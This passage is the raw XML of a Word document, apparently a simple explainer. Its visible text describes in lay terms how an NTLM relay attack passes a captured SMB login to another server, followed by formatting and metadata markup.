        <w:t xml:space="preserve"> (usually NTLM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63405C80" w14:textId="70BDB167" w:rsidR="006764B3" w:rsidRPr="006764B3" w:rsidRDefault="006764B3" w:rsidP="006764B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006764B3">
        <w:t xml:space="preserve">The attacker grabs that login and </w:t>
      </w:r>
      <w:r w:rsidRPr="006764B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>relays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transfer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006764B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> it to another SMB server</w:t>
      </w:r>
      <w:r w:rsidRPr="006764B3">
        <w:t xml:space="preserve"> (or service that accepts NTLM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372992E9" w14:textId="77777777" w:rsidR="006764B3" w:rsidRPr="006764B3" w:rsidRDefault="006764B3" w:rsidP="006764B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006764B3">
        <w:t>That other server thinks the attacker is you and lets them in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917F216" w14:textId="77777777" w:rsidR="006764B3" w:rsidRDefault="006764B3"/>
    <w:sectPr w:rsidR="00676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44A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="191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050C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCD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53844"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4BAF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511149">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="39138439">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="131867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8A"/>
    <w:rsid w:val="00033702"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006764B3"/>
    <w:rsid w:val="00706476"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00857761"/>
    <w:rsid w:val="0093548A"/>
    <w:rsid w:val="00AD6734"/>
    <w:rsid w:val="00C20176"/>
    <w:rsid w:val="00C820E9"/>
    <w:rsid w:val="00DD7CE7"/>
    <w:rsid w:val="00DE124F"/>
    <w:rsid w:val="00F04CC6"/>
    <w:rsid w:val="00F8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4E96"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F8920035-72F3-4CF3-9ADF-7DD002FA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2025-09-26T06:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-26T07:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>